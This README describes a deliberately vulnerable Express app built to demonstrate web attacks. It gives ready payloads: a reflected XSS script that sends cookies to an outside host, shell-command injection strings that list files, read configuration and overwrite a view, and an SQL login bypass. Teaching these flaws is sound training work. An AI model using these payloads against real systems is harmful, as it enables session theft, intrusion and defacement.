Tactical Exploit

A quick and dirty express app with exploits used for demonstration purposes.

  • SQL Injection
  • Cross-Site Scripting (XSS) (maybe using metasploitable)
  • Command Execution
  • Reflected XSS

Install dependencies

npm install

Also make sure your OS has whois installed and available; it's used by the "command execution" vulnerability.

Start the server

npm start

Point your browser to http://localhost:3000/

Use a different port, for example port 3030:

PORT=3030 npm start

Stop the server with CTRL-C

Reset the database

  1. Stop the server if it is running using CTRL-C
  2. npm run deletedb
  3. Start the server, it will recreate the database: npm start

Reset the code

The command execution vulnerability lets an injected command overwrite the app's own code!

Reset the code using:

npm run reset

Clobber code changes and the database

Do both in one go (reset the database and the code):

npm run clobber

Reflected XSS

Path: /reflected-xss

Query input:

<script>window.location='http://example.com/?cookies='+document.cookie</script>

Constructed link:

http://localhost:3000/reflected-xss?q=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fexample.com%2F%3Fcookies%3D%27%2Bdocument.cookie%3C%2Fscript%3E

Command Execution

Path: /command-execition

example.com && export
example.com && pwd && ls -la && cat package.json && ls -l views && echo "Mwuahahah" > views/compromised.ejs
example.com > /dev/null|| pwd && ls -la && cat package.json && whoami && groups && uname -a|| ifconfig

Cross-Site-Scripting (XSS)

SQL Injection

  • Bypass browser-side validation: use the developer tools to add the novalidate attribute to the form
  • Username: bob" or 1=1--
  • Password: anything
